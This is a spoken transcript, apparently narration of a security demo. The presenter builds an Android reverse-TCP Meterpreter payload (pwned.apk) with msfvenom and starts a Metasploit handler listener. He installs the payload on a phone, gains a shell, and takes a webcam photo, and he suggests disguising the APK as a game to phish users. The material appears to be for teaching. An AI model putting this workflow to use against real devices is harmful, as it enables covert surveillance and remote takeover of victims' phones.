Alright, so I'm at the Kali Linux console. I'm going to run MSF Venom to create a payload here for our Android victim. So interpreter slash reverse underscore TCP. So what this is a payload that is a reverse shell. Set the host to .3 and then the port to 8989. So this is creating a payload which I'll pipe out to the OPT folder, call it pwned.apk. It's going to run and create that payload and then pipe that out to the OPT folder. So we'll do an ls and take a look at the contents of the OPT folder. You can see the pwned.apk file. Now before I transfer this APK to the Android device, I need to go to the Metasploit framework console and set up the listener and make sure that the server is listening and ready to receive that reverse shell connection that will be initiated from the Android device. So I'm going to type use exploit / multi-handler, and then I'm going to set this up as an Android payload. Basically saying that the payload will be connecting back on this interpreter reverse TCP shell. And so as we communicate with the device, it knows that it's an Android device and will have those Android commands available to us. So reverse underscore TCP. And then I'm also going to set the localhost IP. So Metasploit knows which IP to listen on and which port to listen on. And I'll set the port to 8989. So L port 8989, and then type in exploit. So now it's running and listening. Okay, we've transferred back over to the Android device. And so now I'm going to grab that APK file and move it from the cloud drive and install it onto the Android device. Now, in real life, in a real world scenario, we would probably create a phishing exploit as another step here, and then have that user download this APK via a phishing exploit, where they might think that it's a legitimate application. Maybe you could call it Super Mario, put a little icon on it, and you could fool the user into downloading essentially a remote access Trojan application. So now I'm going to install it, and once it installs, it's actually not going to do anything visually, but it is establishing a session connection back to the Metasploit server. So back to the Metasploit server console, where it's still listening. Now you can see it picked up the session from the Android device. So we have an active session, a reverse shell back from the Android device. So I'm going to run sysinfo. You can see we have the connection, and we have ownership of the Android device. And that means that I can do things like look at the webcams, and I can snap pictures. So I'm going to choose webcam underscore snap 1. That's going to take a picture utilizing the back camera. And you can see that I was looking at my monitor, which is Google site.